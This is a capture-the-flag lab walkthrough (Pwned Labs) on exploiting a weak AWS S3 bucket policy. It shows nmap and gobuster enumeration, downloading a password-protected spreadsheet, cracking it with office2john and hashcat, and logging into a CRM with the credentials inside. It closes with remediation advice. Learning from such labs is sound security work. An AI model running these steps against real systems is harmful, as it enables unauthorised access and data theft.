Exploiting Weak S3 Bucket Policies

A walkthrough demonstrating how weak S3 Bucket policies can lead to system compromise, data exposure and exfiltration.

CTF Source: Pwned Labs

YouTube Walkthrough

Overview

In this walkthrough, we're tasked with accessing sensitive data and demonstrating the extent of impact using an IP address and some AWS Access Keys discovered on a previous engagement.

Pre-Requisites

Install awscli: brew install awscli (mac) apt install awscli (linux)

Install nmap: brew install nmap (mac) apt intall nmap (linux)

Install gobuster: brew install gobuster (mac) apt intall gobuster (linux)

Install hashcat: brew install hashcat (mac) apt intall hashcat (linux)

Install JohnTheRipper: brew install john (mac) apt intall john (linux)

Walkthrough

To start, we’re given an IP of ⁠13.43.144.61⁠And some AWS Access Keys for the user, ⁠test

Nmap Enumeration

After configuring our AWS access keys (⁠aws configure⁠), let’s run some nmap scans and see what we’re dealing with.

nmap -Pn 13.43.144.61

Host is up (0.12s latency).
Not shown: 925 filtered tcp ports (no-response), 74 closed tcp ports (conn-refused)
PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 635.16 seconds
nmap -Pn -p3000 -sC -sV 13.43.144.61

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Huge Logistics > Home
|_http-cors: HEAD GET POST PUT DELETE PATCH

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds

Alright so looks like we’re dealing with a website on port ⁠3000⁠.

Gobuster Enumeration

Before we view the web page in the browser, let’s kick off a gobuster scan.

Gobuster will enumerate over our wordlist and attempt to find other directories that may exist.⁠-b 404⁠ means we’ll hide any results that do not exist.

gobuster fuzz -u http://13.43.144.61:3000/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404

Let’s let this run and come to it later.

Website Enumeration

We can view the site in our browser but it looks like a pretty standard website.

Looking at the source code though and we find an S3 bucket endpoint!

S3 Bucket Enumeration

It doesn’t appear we can see the data from the browser.

Let’s try the AWS CLI instead. Both of these commands fail.

aws s3 ls s3://hugelogistics-data 
aws s3 ls s3://hugelogistics-data --no-sign-request

But the command to retrieve the bucket policy works!

aws s3api get-bucket-policy --bucket hugelogistics-data | jq -r .Policy | jq .

{
  "Version": "2012-10-17",                                                         
  "Statement": [                                                                   
    {                                                                              
      "Sid": "PublicReadForAuthenticatedUsersForObject",                           
      "Effect": "Allow",                                                           
      "Principal": {                                                               
        "AWS": "*"                                                                 
      },                                                                           
      "Action": [                                                                  
        "s3:GetObject",                                                            
        "s3:GetObjectAcl"                                                          
      ],                                                                           
      "Resource": [                                                                
        "arn:aws:s3:::hugelogistics-data/backup.xlsx",                             
        "arn:aws:s3:::hugelogistics-data/background.png"                           
      ]                                                                            
    },                                                                             
    {                                                                              
      "Sid": "AllowGetBucketPolicy",                                               
      "Effect": "Allow",                                                           
      "Principal": {                                                               
        "AWS": "*"                                                                 
      },                                                                           
      "Action": "s3:GetBucketPolicy",                                              
      "Resource": "arn:aws:s3:::hugelogistics-data"                                
    }                                                                              
  ]                                                                                
}   

Check that out! Let’s copy that ⁠backup.xlsx⁠ file locally since we have the permission (⁠s3:GetObject⁠)

aws s3 cp s3://hugelogistics-data/backup.xlsx .

download: s3://hugelogistics-data/backup.xlsx to ./backup.xlsx 

If we try to open the file we’ll see it’s password protected.

Cracking the Password with Hashcat

Let’s attempt to crack the password on this ⁠xlsx⁠ file.

Since I’m on Kali Linux, I’m going to run a tool called ⁠john2office⁠ because this is a Microsoft Office file.

You can find the full toolset here.

office2john ./backup.xlsx > hash_backup.xlsx.txt       
cat hash_backup.xlsx.txt

backup.xlsx:$office$*2013*100000*256*16*5e8372cf384ae36827c769ef177230fc*c7367d060cc4cab8d01d887a992fbe2b*a997b2bfbbf996e1b76b1d4f070dc9214db97c19411eb1fe0ef9f5ff49b01904

Now we have a hash of the file and it looks like it’s an Office 2013 file.

Next, we will use a tool called ⁠hashcat⁠ and attempt to crack the file password.

First, we need to determine the hash type to use. We can do this like so, ⁠hashcat --help | grep Office

So our hash type is ⁠9600⁠.

Now let’s verify the hash is in the correct format.

We can refer to hashcat’s documentation and look for an example of an Office 2013 hash.

If we compare this to the hash generated by ⁠office2john⁠, we see we need to modify the hash and remove ⁠backup.xlsx:

Let’s run the cracking with a popular wordlist, ⁠rockyou⁠.

hashcat -a 0 -m 9600 hash_backup.xlsx.txt rockyou.txt

We cracked the password!

Side note, if you rerun this command, it won’t return the password.

This is because it was already cracked and is stored in the file located here ⁠~/.local/share/hashcat/hashcat.potfile⁠.

Now we can see that ⁠xlsx⁠ file and find a ton of credentials to several systems!

Gaining Access to the Website

Remember the ⁠gobuster⁠ scan we ran earlier? Let’s check on how that’s going.

Looks like we successfully found some more directories!

If we navigate to the page ⁠http://13.43.144.61:3000/crm⁠ we’re met with a login page.

Let’s try the credentials from our file for the ⁠WebCRM⁠ system to see if they work.

We’re in!

Exfiltrating Data and Finding the Flag!

Poking around, we can find some Invoice data. We’ll download that since there isn’t much else to do.

Opening this up we find the Flag!

Wrap Up

In this scenario, we were tasked with accessing sensitive data with AWS credentials discovered in a previous engagement. After enumerating our access to an S3 bucket we found a password-protected file. After cracking this file, it revealed credentials to several systems. Using these credentials, we gained access to the CRM platform and obtained access to sensitive data. Here are some recommended actions administrators can take to prevent this from happening.

  1. Tighten the S3 Bucket Policy

    • “Everyone” could perform the following actions,

      • ⁠s3:GetBucketPolicy

        • Not needed by everyone, restrict to admins

      • ⁠s3:GetObject

        • Okay for a website but non-website data was also stored in this bucket (see #2)

      • ⁠s3:GetObjectAcl

        • Not needed by everyone, restrict to admins

  2. Eliminate S3 bucket multi-use

    • Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.

    • Since this bucket is hosting a publicly accessible website, only store files relevant to the website.

  3. Ensure employees are trained and have access to a credential manager

    • In this case, a spreadsheet was found containing login credentials to several systems.

    • Securely store credentials in solutions such as Bitwarden, 1Password, AWS Secrets Manager, HashiCorp Vault, or similar.

  4. Secure login to CRM system

    • Protect access to the CRM system by removing (or restricting) public access, restricting login behind SSO, and requiring MFA.

Last updated